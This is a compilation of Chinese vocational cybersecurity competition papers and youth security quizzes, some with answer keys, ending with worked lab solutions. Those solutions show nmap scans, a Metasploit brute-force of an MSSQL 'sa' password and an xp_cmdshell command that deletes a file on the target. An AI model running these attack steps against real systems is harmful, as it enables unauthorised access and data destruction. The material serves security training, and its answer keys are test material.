江苏省中职组网络空间安全赛项赛题B
ZZ-2018065全国职业院校技能大赛中职组“网络空间安全”赛卷一

2018年全国职业院校技能大赛中职组“网络空间安全”赛卷一一、竞赛阶段二、拓扑图PC机环境:物理机:Windows7;虚拟机1:Ubuntu Linux 32bit(用户名:root;密码:toor),安装工具集:Backtrack5,安装开发环境:Python3;虚拟机2:Kali(用户名:root;密码:toor);虚拟机3:WindowsXP(用户名:administrator;密码:123456)。
三、竞赛任务书(一)第一阶段任务书(700分)任务1. ARP扫描渗透测试(100分)任务环境说明:✓服务器场景:server2003(用户名:administrator;密码:空)✓服务器场景操作系统:Windows server20031.通过本地PC中渗透测试平台BT5对服务器场景server2003进行ARP扫描渗透测试(使用工具arping,发送请求数据包数量为5个),并将该操作使用命令中固定不变的字符串作为Flag提交;(16分)2.通过本地PC中渗透测试平台BT5对服务器场景server2003进行ARP扫描渗透测试(使用工具arping,发送请求数据包数量为5个),并将该操作结果的最后1行,从左边数第2个数字作为Flag提交;(17分)3. 通过本地PC中渗透测试平台BT5对服务器场景server2003行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),并将工具Metasploit 中arp_sweep模块存放路径字符串作为Flag(形式:字符串1/字符串2/字符串3/…/字符串n)提交;(16分)4. 通过本地PC中渗透测试平台BT5对服务器场景server2003进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块运行显示结果的最后1行的最后1个单词作为Flag提交;(17分)5. 通过本地PC中渗透测试平台BT5对服务器场景server2003进行ARP 扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块运行显示结果的第1行出现的IP地址右边的第1个单词作为Flag提交;(16分)6. 通过本地PC中渗透测试平台BT5对服务器场景server2003进行ARP 扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块的运行命令字符串作为Flag提交;(18分)任务2. 漏洞扫描与利用(100分)任务环境说明:✓服务器场景:server2003(用户名:administrator;密码:空)✓服务器场景操作系统:Windows server20031.通过本地PC中渗透测试平台Kali对服务器场景server2003以半开放式不进行ping的扫描方式并配合a,要求扫描信息输出格式为xml文件格式,从生成扫描结果获取局域网(例如172.16.101.0/24)中存活靶机,以xml格式向指定文件输出信息(使用工具NMAP,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为FLAG提交;(12分)2.根据第一题扫描的回显信息分析靶机操作系统版本信息,将操作系统版本信息作为FLAG提交;(9分)3.根据第一题扫描的回显信息分析靶机服务开放端口,分析开放的服务,并将共享服务的开放状态作为FLAG提交;(9分)4.在本地PC的渗透测试平台Kali中,使用命令初始化msf数据库,并将使用的命令作为FLAG提交;(10分)5.在本地PC的渗透测试平台Kali中,打开msf,使用db_import将扫描结果导入到数据库中,并查看导入的数据,将查看导入的数据要使用的命令作为FLAG提交;(10分)6.在msfconsole使用search命令搜索MS08067漏洞攻击程序,并将回显结果中的漏洞时间作为FLAG提交;(10分)7.在msfconsole中利用MS08067漏洞攻击模块,将调用此模块的命令作为FLAG提交;(10分)8.在上一步的基础上查看需要设置的选项,并将回显中需设置的选项名作为FLAG提交;(10分)9.使用set命令设置目标IP(在第8步的基础上),并检测漏洞是否存在,将回显结果中最后四个单词作为FLAG提交;(13分)10.查看可选项中存在此漏洞的系统版本,判断该靶机是否有此漏洞,若有,将存在此漏洞的系统版本序号作为FLAG提交,否则FLAG为none。
2018年全国网络空间安全赛卷及评分标准(含一阶段答案)

2018年全国职业院校技能大赛中职组“网络空间安全”正式赛卷一、竞赛阶段二、拓扑图PC机环境:物理机:Windows7;虚拟机1:Ubuntu Linux 32bit(用户名:root;密码:toor),安装工具集:Backtrack5,安装开发环境:Python3;虚拟机2:Kali(用户名:root;密码:toor);虚拟机3:WindowsXP(用户名:administrator;密码:123456)。
三、竞赛任务书(一)第一阶段任务书(700分)任务1. MSSQL数据库渗透测试(100分)任务环境说明:✓服务器场景:server2003(用户名:administrator;密码:空)✓服务器场景操作系统:Windows server20031.在本地PC渗透测试平台BT5中使用zenmap工具扫描服务器场景server2003所在网段(例如:172.16.101.0/24)范围内存活的主机IP地址和指定开放的1433、3306、80端口。
并将该操作使用的命令中必须要使用的字符串作为FLAG提交;(10分)2.通过本地PC中渗透测试平台BT5对服务器场景server2003进行系统服务及版本扫描渗透测试,并将该操作显示结果中数据库服务对应的服务端口信息作为FLAG提交;(10分)3.在本地PC渗透测试平台BT5中使用MSF中模块对其爆破,使用search命令,并将扫描弱口令模块的名称作为FLAG提交;(10分)4.在上一题的基础上使用命令调用该模块,并查看需要配置的信息(使用show options命令),将回显中需要配置的目标地址,密码使用的猜解字典,线程,账户配置参数的字段作为FLAG提交(之间以英文逗号分隔,例hello,test,..,..);(10分)5.在msf模块中配置目标靶机IP地址,将配置命令中的前两个单词作为FLAG提交;(10分)6.在msf模块中指定密码字典,字典路径为/root/2.txt爆破获取密码并将得到的密码作为FLAG提交;(14分)7.在msf模块中切换新的渗透模块,对服务器场景server2003进行数据库服务扩展存储过程进行利用,将调用该模块的命令作为FLAG提交;(14分)8.在上一题的基础上,使用第6题获取到的密码并进行提权,同时使用show options命令查看需要的配置,并配置CMD参数来查看系统用户,将配置的命令作为FLAG提交;(14分)9.在利用msf模块获取系统权限并查看目标系统的异常(黑客)用户,并将该用户作为FLAG提交。
2021年江苏网安竞赛活动简答题库

网络安全竞赛试题(小学版)【仅供参照学习】三、简答题(一)【1】小明新申请了一种邮箱,由于小明名字被注册了,因此小明使用了自己生日加名字xiaoming0807作为邮箱名,请问这样设立邮箱名与否合理,并给出一种理由1. 不合理2.泄漏了个人姓名和生日信息,容易被犯罪份子运用【2】04月19日,习近平总书记在网络安全和信息化工作座谈会上发言中提出了从三个方面把握互联网核心技术,这三个方面技术是1. 基本技术、通用技术2. 非对称技术、“杀手锏”技术3. 前沿技术、颠覆性技术【3】04月19日,习近平总书记在网络安全和信息化工作座谈会上发言中提出了全球互联网发展治理四项原则,这四项原则是1. 尊重网络主权2. 维护和平安全3. 开放合伙4.构建良好秩序【4】全球十大互联网公司有4个中华人民共和国公司,请问这四个公司是1. 阿里巴巴2. 腾讯3.百度4.京东【5】黑客们常会运用某些oday或1day漏洞对操作系统和软件进行袭击,那么什么是0day 和1day漏洞1.厂商没有发现、或没有公开漏洞(答对一种没有即可)2. 厂商已经发现并刚刚发布了补丁漏洞【6】网络空间安全基本内容涉及到1.密码学及应用2.网络安全3,系统安全4. 应用安全5.信息内容安全【7】网络安全中会用到诸多安全设备,请说出两种安全设备1. 防火墙2. 入侵检测系统3. 抗回绝服务袭击设备4.Web应用防火墙注:说出任意2种都可以【8】请说出三种黑客获取顾客密码方式1. 暴力破解2. 字典破解3. 木马窃取4. 撞库5.彩虹表破解注:说出任意3种都可以【9】请说出中华人民共和国首颗量子卫星名字,以及它重要研制单位和负责人名字1. 墨子号2. 中华人民共和国科学技术大学3.潘建伟【10】撞库是黑客通过收集互联网已泄露网站注册顾客和密码信息,尝试批量自动登录其她网站验证后,得到一系列可以登录真实账户,请给出两个能避免撞库袭击办法1. 每个网站都设立不同顾客名和密码2. 网站登录在密码之外还采用短信验证码等其她验证手段【11】网站服务器是当前黑客袭击首要目的之一,请给出3种网站服务器也许遭受袭击形式:1. 回绝服务袭击2. 网站挂马3. 网站后门4. 网站黑链5. 勒索袭击注:说出任意3种都可以【12】网站是当前互联网上最惯用服务,请说出三种开发一种网站使用到语言:1. HTML2. Javascript3. CSS4. 各类脚本语言如Python,Php,Ruby等5. Java注:说出任意3种都可以,【13】老式Windows系统中都会看到一种超级管理员(Administrator)账户,在新版Windows 系统中咱们不再能看到系统账户中有超级管理员,请给出微软公司这样设计理由1. Administrator账户不受顾客账户管理机制管理,在使用中存在很大风险,该账户被系统禁用了2.普通顾客可以使用自定义管理员组账号完毕需要管理员权限工作【14】为了进行权限控制,在创立顾客时,Windows系统提供了三类顾客供选取,请给出三类顾客名称:1. 管理员顾客,2. 原则顾客3. 宾客顾客【15】《网络安全法》里拟定网络安全法三条基本原则涉及哪些1. 网络空间主权原则2. 网络安全与信息化发展并重原则3. 共同治理原则【16】《网络安全法》进一步明确了政府各部门职责权限,请问网信某些和其她某些分别负责什么职责1. 国家网信部门负责统筹协调网络安全工作和有关监督管理工作2. 国务院电信主管部门、公安部门和其她关于机关依法在各自职责范畴内负责网络安全保护和监督管理工作【17】《网络安全法》完善了网络安全义务和责任,请说出3条网络运营者义务1. 守法义务2. 遵守社会公德、商业道德义务3. 诚实信用义务4. 网络安全保护义务5. 接受监督义务注:说出任意3种都可以,【18】徐玉玉事件,让大众更深刻地结识到了电信诈骗危害,国家发布了《关于办理电信网络诈骗等刑事案件合用法律若干问题意见》,请说出其中界定诈骗财物“数额较大”“数额巨大”“数额特别巨大"三个原则分别是多少1. 三千元以上为数额较大三万元以上为数额巨大五十万元以上为数额特别巨大【19】,国家发布了《国家网络空间安全战略》,其中指出国内网络安全形势日益严峻,请阐明国内哪四个方面安全受到威胁1. 网络渗入危害政治安全2. 网络袭击威胁经济安全3. 网络有害信息侵蚀文化安全4. 网络恐怖和违法犯罪破坏社会安全【20】,国家发布了《国家网络空间安全战略》,其中指出国内需要完善网络治理体系,健全网络安全法律法规体系,制定出台有关法律,请问《战略》中提及了那两部法律1. 网络安全法2. 未成年人网络保护条例三、简答题(二)1、《互联网顾客账号名称管理规定》中,对顾客申请账号时设立基本信息进行了限制。
2018江苏省青少年网络信息安全知识竞赛题目与答案

2018年江苏省青少年网络信息安全知识竞赛题目及答案一、单选题(每题3分)1.( )是按备份周期对整个系统所有的文件(数据)进行备份,是克服系统数据不安全的最简单的方法。
A. 按需备份策略B. 完整备份策略C. 差分备份策略D. 增量备份策略。
参考答案:B2.对于新购买的电脑,不建议的行为是( ) A. 设置开机密码B. 安装QQ软件C. 让电脑公司重装XP系统D. 启用Windows Update。
参考答案:C3.下列操作中不能防范个人口令被字典暴力攻击的是( ) A. 确保口令不在终端上再现B. 避免使用过短的口令C. 使用动态口令卡产生的口令D. 严格限定从一个给定的终端进行非法认证的次数。
参考答案:A4.用户收到了一封可疑的电子邮件,要求用户提供银行账户及密码,这是属于何种攻击手段?( ) A. 缓存溢出攻击B. 钓鱼攻击C. 暗门攻击D. DDOS攻击。
参考答案:B5.Windows保存用户账户信息的文件是( ) A. SAM B. UserDB C. Passwd D. 注册表。
参考答案:A6.以下选项中计算机网络安全属性不包括哪一项( ) A. 机密性B. 完整性C. 可用性D. 稳定性。
参考答案:D7.单钥密码体制的保密性主要取决于( ) A. 密钥的安全性B. 密文的安全性C. 加密算法的安全性D. 解密算法的安全性。
参考答案:A8.橘皮书定义了4个安全层次,从D 层(最低保护层)到A 层(验证性保护层),属于D 级的系统是不安全的,以下操作系统中不属于C 级的是( ) A. UNIX 系统B. LINUX 系统C. WINDOWS 2000D. WINDOWS 98。
参考答案:D9.以下属于防范假冒热点攻击的措施是( ) A. 尽量使用免费WIFI B. 不要打开WIFI 的自动连接功能C. 在免费WIFI 上购物D. 任何时候不使用WIFI 联网。
参考答案:B10.IP地址不用于什么设备( ) A. 网络设备B. 网络上的服务器C. 移动硬盘D. 上网的计算机。
ZZ-2018065全国职业院校技能大赛中职组“网络空间安全”赛卷十

2018年全国职业院校技能大赛中职组“网络空间安全”赛卷十一、竞赛阶段二、拓扑图PC机环境:物理机:Windows7;虚拟机1:Ubuntu Linux 32bit(用户名:root;密码:toor),安装工具集:Backtrack5,安装开发环境:Python3;虚拟机2:Kali(用户名:root;密码:toor);虚拟机3:WindowsXP(用户名:administrator;密码:123456)。
三、竞赛任务书(一)第一阶段任务书(700分)任务1. MSSQL数据库渗透测试(100分)任务环境说明:✓服务器场景:server2003(用户名:administrator;密码:空)✓服务器场景操作系统:Windows server20031.在本地PC渗透测试平台BT5中使用zenmap工具扫描服务器场景server2003所在网段(例如:172.16.101.0/24)范围内存活的主机IP地址和指定开放的1433、3306、80端口。
并将该操作使用的命令中必须要使用的字符串作为FLAG提交;(10分)2.通过本地PC中渗透测试平台BT5对服务器场景server2003进行系统服务及版本扫描渗透测试,并将该操作显示结果中数据库服务对应的服务端口信息作为FLAG提交;(10分)3.在本地PC渗透测试平台BT5中使用MSF中模块对其爆破,使用search 命令,并将扫描弱口令模块的名称作为FLAG提交;(10分)4.在上一题的基础上使用命令调用该模块,并查看需要配置的信息(使用show options命令),将回显中需要配置的目标地址,密码使用的猜解字典,线程,账户配置参数的字段作为FLAG提交(之间以英文逗号分隔,例hello,test,..,..);(10分)5.在msf模块中配置目标靶机IP地址,将配置命令中的前两个单词作为FLAG提交;(10分)6.在msf模块中指定密码字典,字典路径为/root/2.txt爆破获取密码并将得到的密码作为FLAG提交;(14分)7.在msf模块中切换新的渗透模块,对服务器场景server2003进行数据库服务扩展存储过程进行利用,将调用该模块的命令作为FLAG提交;(14分)8.在上一题的基础上,使用第6题获取到的密码并进行提权,同时使用show options命令查看需要的配置,并配置CMD参数来查看系统用户,将配置的命令作为FLAG提交;(14分)9.在利用msf模块获取系统权限并查看目标系统的异常(黑客)用户,并将该用户作为FLAG提交。
2014年江苏省信息安全大赛样题

2014年江苏省高职技能大赛“信息安全及云安全”赛项比赛样题第一部分:赛题基础信息1、拓扑图2、IP地址规划表3、设备初始化信息第二部分:比赛试题任务一:安全网络组建(1000分)提示:按照赛题要求,将每道题答案以文字说明加配置截图方式填写到赛题答卷中。
DCRS需提交整机配置文件。
赛题答卷模板存放在‘提交专用U盘’根目录中。
1、根据拓扑图正确连接设备2、根据大赛规划设置IP地址与VLAN等基本信息。
3、要求中心防火墙和分支防火墙实现IPSEC VPN,使中心网段192.168.1.0/24段和分支网段192.168.2.0/24能通过IPSEC互通。
4、中心端防火墙要保证中心端内网192.168.1.0/24能够访问外网,即内网192.168.1.0段的机器能够访问1.1.1.2即可;5、中心端服务器192.168.1.10/24是一台web服务器,需要映射到外网,同时要保证内网和外网否能通过1.1.1.3的公网地址访问该服务器;6、为保证内网终端安全,要求内网所有用户的MAC地址与接入交换机接口进行绑定;7、进一步保证内网安全,在接入层交换机的1-8接口配置端口隔离。
8、由于内部人员总是下载数据,所以将内部的PCB进行流量限制,流量限制在5M/s。
在内网接入层交换机上配置。
9、在中心端防火墙上为防止内网用户占用带宽较高,针对内网P2P下载限制流量到10M;10、为提交中心端内网用户上班效率,要求中心端防火墙禁止使用IM等。
任务二:渗透测试及安全防护A、网站防护任务(700分)提示:WEB服务器为DCST-N10设备的ETH0接口。
按照赛题要求,将每道题答案以文字说明加配置截图方式填写到赛题答卷中。
赛题答卷模板存放在本地计算机‘提交专用U盘’根目录中。
为避免产生环路而造成的比赛时间耽误,请勿将WEB服务器与系统服务器同时连接交换机。
作为公司的网络管理者,你发现你所在的公司网站极不安全,在一次次的检测中,发现有一名不法者以SQL注入等方式入侵了你公司的网站,为此你要做出正确的部署,以保护网站的安全。
江苏省2020年度中职组网络空间安全赛项样题及答案(供参考)

2018年度全国职业技能大赛中职组“网络空间安全”赛项江苏省竞赛任务书(样题)一、竞赛时间9:00-12:00,共计3小时。
二、竞赛阶段简介三、竞赛任务书内容(一)拓扑图(二)第一阶段任务书任务1.ARP扫描渗透测试任务环境说明:✓服务器场景:CentOS5.5✓服务器场景操作系统:CentOS5.51.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具arping,发送请求数据包数量为5个),并将该操作使用命令中固定不变的字符串作为Flag提交;Arping –c 52.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具arping,发送请求数据包数量为5个),并将该操作结果的最后1行,从左边数第2个数字作为Flag提交;Arping –c 5root@kali:~# arping -c 5ARPING from eth0Unicast reply from [00:0C:29:62:80:73] 1.017msUnicast reply from [00:0C:29:62:80:73] 0.638msUnicast reply from [00:0C:29:62:80:73] 1.051msUnicast reply from [00:0C:29:62:80:73] 1.590msUnicast reply from [00:0C:29:62:80:73] 1.051msSent 5 probes (1 broadcast(s))Received 5 response(s)Flag:53.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),并将工具Metasploit 中arp_sweep模块存放路径字符串作为Flag(形式:字符串1/字符串2/字符串3/…/字符串n)提交;msf > use auxiliary/scanner/discovery/arp_sweepFlag:Auxiliary/scanner/discovery/arp_sweep4.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块运行显示结果的最后1行的最后1个单词作为Flag提交;msf > use auxiliary/scanner/discovery/arp_sweepmsf auxiliary(arp_sweep) > run[*] appears to be up (VMware, Inc.).[*] appears to be up (VMware, Inc.).[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completedFlag:completed5.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块运行显示结果的第1行出现的IP地址右边的第1个单词作为Flag提交;msf auxiliary(arp_sweep) > run[*] appears to be up (VMware, Inc.).[*] appears to be up (VMware, Inc.).[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completedFlag:appears6.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块的运行命令字符串作为Flag提交;Flag:exploit or run任务2.操作系统及应用程序扫描渗透测试任务环境说明:✓服务器场景:CentOS5.5✓服务器场景操作系统:CentOS5.51.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ping扫描渗透测试(使用工具nmap,使用参数n,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;Flag:Nmap –n –Sp2.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ping扫描渗透测试(使用工具nmap),并将该操作显示结果的上数第3行左数第3个单词作为Flag提交;root@kali:~# nmap -n -sPStarting Nmap 7.40 ( ) at 2017-12-10 19:59 ESTNmap scan report forHost is up (0.00069s latency).Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds Flag:up3.通过PC2中渗透测试平台对服务器场景CentOS5.5进行综合性扫描渗透测试(使用工具nmap,使用参数n,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;root@kali:~# nmap -n -AStarting Nmap 7.40 ( ) at 2017-12-10 20:11 ESTNmap scan report forHost is up (0.00025s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 4.3 (protocol 2.0)| ssh-hostkey:| 1024 95:7e:e7:af:67:6f:3b:ad:dd:4d:37:a6:34:ac:6c:08 (DSA) |_ 2048 90:3f:56:9b:cd:c7:5b:aa:1c:40:57:4d:45:c4:c1:cd (RSA) 111/tcp open rpcbind 2 (RPC #100000)| rpcinfo:| program version port/proto service| 100000 2 111/tcp rpcbind| 100000 2 111/udp rpcbind| 100024 1 910/udp status|_ 100024 1 913/tcp statusMAC Address: 00:0C:29:62:80:73 (VMware)Device type: general purposeRunning: Linux 2.6.XOS CPE: cpe:/o:linux:linux_kernel:2.6OS details: Linux 2.6.9 -Network Distance: 1 hopTRACEROUTEHOP RTT ADDRESS1 0.25 msOS and Service detection performed. Please report any incorrect results at / .Nmap done: 1 IP address (1 host up) scanned in 8.22 secondsFlag:Nmap –n –A4.通过PC2中渗透测试平台对服务器场景CentOS5.5进行综合性扫描渗透测试(使用工具nmap,使用参数n,使用必须要使用的参数),并将该操作显示结果的最后1行最后1个单词作为Flag提交;root@kali:~# nmap -n -AStarting Nmap 7.40 ( ) at 2017-12-10 20:11 ESTNmap scan report forHost is up (0.00025s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 4.3 (protocol 2.0)| ssh-hostkey:| 1024 95:7e:e7:af:67:6f:3b:ad:dd:4d:37:a6:34:ac:6c:08 (DSA) |_ 2048 90:3f:56:9b:cd:c7:5b:aa:1c:40:57:4d:45:c4:c1:cd (RSA) 111/tcp open rpcbind 2 (RPC #100000)| rpcinfo:| program version port/proto service| 100000 2 111/tcp rpcbind| 100000 2 111/udp rpcbind| 100024 1 910/udp status|_ 100024 1 913/tcp statusMAC Address: 00:0C:29:62:80:73 (VMware)Device type: general purposeRunning: Linux 2.6.XOS CPE: cpe:/o:linux:linux_kernel:2.6OS details: Linux 2.6.9 -Network Distance: 1 hopTRACEROUTEHOP RTT ADDRESS1 0.25 msOS and Service detection performed. Please report any incorrect results at / .Nmap done: 1 IP address (1 host up) scanned in 8.22 secondsFlag:seconds5.通过PC2中渗透测试平台对服务器场景CentOS5.5进行操作系统扫描渗透测试(使用工具nmap,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;root@kali:~# nmap -OStarting Nmap 7.40 ( ) at 2017-12-10 20:13 ESTNmap scan report forHost is up (0.00044s latency).Not shown: 998 closed portsPORT STATE SERVICE22/tcp open ssh111/tcp open rpcbindMAC Address: 00:0C:29:62:80:73 (VMware)Device type: general purposeRunning: Linux 2.6.XOS CPE: cpe:/o:linux:linux_kernel:2.6OS details: Linux 2.6.9 -Network Distance: 1 hopOS detection performed. Please report any incorrect results at / .Nmap done: 1 IP address (1 host up) scanned in 14.80 seconds Flag:Nmap –O6.通过通过PC2中渗透测试平台对服务器场景CentOS5.5进行系统服务及版本号扫描渗透测试(使用工具nmap,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;Flag:Nmap –sV7.通过通过PC2中渗透测试平台对服务器场景CentOS5.5进行系统服务及版本号扫描渗透测试(使用工具nmap,使用必须要使用的参数),并将该操作显示结果的SSH服务版本信息字符串作为Flag提交;root@kali:~# nmap -sVStarting Nmap 7.40 ( ) at 2017-12-10 20:17 ESTNmap scan report forHost is up (0.00014s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 4.3 (protocol 2.0)111/tcp open rpcbind 2 (RPC #100000)MAC Address: 00:0C:29:62:80:73 (VMware)Service detection performed. Please report any incorrect results at / .Nmap done: 1 IP address (1 host up) scanned in 19.60 seconds Flag:OpenSSH 4.3任务3.Web应用程序文件包含安全攻防任务环境说明:✓服务器场景名称:WebServ2003✓服务器场景安全操作系统:Microsoft Windows2003 Server✓服务器场景安装中间件:Apache2.2;✓服务器场景安装Web开发环境:Php6;✓服务器场景安装数据库:Microsoft SqlServer2000;✓服务器场景安装文本编辑器:EditPlus;1.访问WebServ2003服务器场景,"/"->"Display Uploaded's FileContent",分析该页面源程序,找到提交的变量名,并将该变量名作为Flag(形式:name=“变量名”)提交;2.对该任务题目1页面注入点进行渗透测试,通过,并将注入语句作为Flag提交;3.对该任务题目2页面注入点进行注入以后,将当前页面以Base64编码方式回显内容作为Flag提交;4.通过PHP函数对题目3中Base64编码回显内容进行解码,并将解码内容作为Flag提交;5.进入WebServ2003服务器场景的目录,找到DisplayFileCtrl.php文件,使用EditPlus工具打开并填写该文件中空缺的F1、F2、F3、F4的值,使之可以抵御文件包含渗透测试,并提交Flag(形式:F1|F2|F3|F4);6.再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对WebServ2003服务器场景进行文件包含渗透测试无效,并将回显页面源文件内容作为Flag提交;任务4.数据库安全加固任务环境说明:✓服务器场景名称:WebServ2003✓服务器场景安全操作系统:Microsoft Windows2003 Server✓服务器场景安装中间件:Apache2.2;✓服务器场景安装Web开发环境:Php6;✓服务器场景安装数据库:Microsoft SqlServer2000;✓服务器场景安装文本编辑器:EditPlus;1.对服务器场景WebServ2003安装补丁,使其中的数据库MicrosoftSqlServer2000能够支持远程连接,并将补丁包程序所在目录名称作为Flag提交;2.对服务器场景WebServ2003安装补丁,使其中的数据库MicrosoftSqlServer2000能够支持远程连接,在安装补丁后的服务器场景中运行netstat–an命令,将回显的数据库服务连接状态作为Flag提交;C:\Documents and Settings\Administrator>netstat -anActive ConnectionsProto Local Address Foreign Address State TCP LISTENINGTCP LISTENINGTCP LISTENINGTCP LISTENINGTCP LISTENINGUDP *:*UDP *:*UDP *:*UDP *:*UDP *:*UDP *:*UDP *:*UDP *:*Flag:LISTENING3.通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务扫描渗透测试,并将扫描结果作为Flag提交;msf > use auxiliary/scanner/mssql/mssql_pingmsf auxiliary(mssql_ping) > run[*] - SQL Server information for[+] - ServerName = SERVER[+] - InstanceName = MSSQLSERVER[+] - IsClustered = No[+] - Version =[+] - tcp = 1433[+] - np = \\SERVER\pipe\sql\query[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed4.通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务超级管理员口令暴力破解(使用PC2中的渗透测试平台中的字典文件superdic.txt),并将破解结果中的最后一个字符串作为Flag提交;msf > use auxiliary/scanner/mssql/mssql_loginmsf auxiliary(mssql_login) > set username samsf auxiliary(mssql_login) > set pass_file/usr/share/wordlists/metasploit/password.lstmsf auxiliary(mssql_login) > run[*] - - MSSQL - Starting authentication scanner.[!] - No active DB -- Credential data will not be saved![-] - - LOGIN FAILED: WORKSTATION\sa:!@#$% (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:!@#$%^ (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:!@#$%^& (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!@#$%^&* (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!boerbul (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!boerseun (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!gatvol (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!hotnot (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:!kak (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!koedoe (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!likable (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!poes (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!pomp (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!soutpiel (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:.net (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:0 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:000000 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:00000000 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:0007 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:007 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:007007 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:0s (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:0th (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:10 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:100 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1000 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1000s (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:100s (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1022 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:10s (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:10sne1 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1111 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:11111 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:111111 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa: (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:112233 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1212 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:121212 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1213 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1214 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1225 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:123 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:123123 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:123321 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1234 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:12345 (Incorrect: ) [+] - - LOGIN SUCCESSFUL: WORKSTATION\sa:123456[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completedFlag: completed5.通过PC2中de1渗透测试平台对服务器场景WebServ2003进行数据库服务扩展存储过程进行利用,删除WebServ2003服务器场景C:\1.txt,并将渗透测试利用命令以及渗透测试平台run结果第1行回显作为Flag 提交;msf auxiliary(mssql_login) > use auxiliary/admin/mssql/mssql_exec msf auxiliary(mssql_exec) > set rhostmsf auxiliary(mssql_exec) > set password 123456msf auxiliary(mssql_exec) > set cmd cmd.exe /c del "C:\\1.txt" msf auxiliary(mssql_exec) > run[*] - SQL Query: EXEC master..xp_cmdshell 'cmd.exe /c del C:\1.txt' output------[*] Auxiliary module execution completedFlag: [*] - SQL Query: EXEC master..xp_cmdshell 'cmd.exe /c del 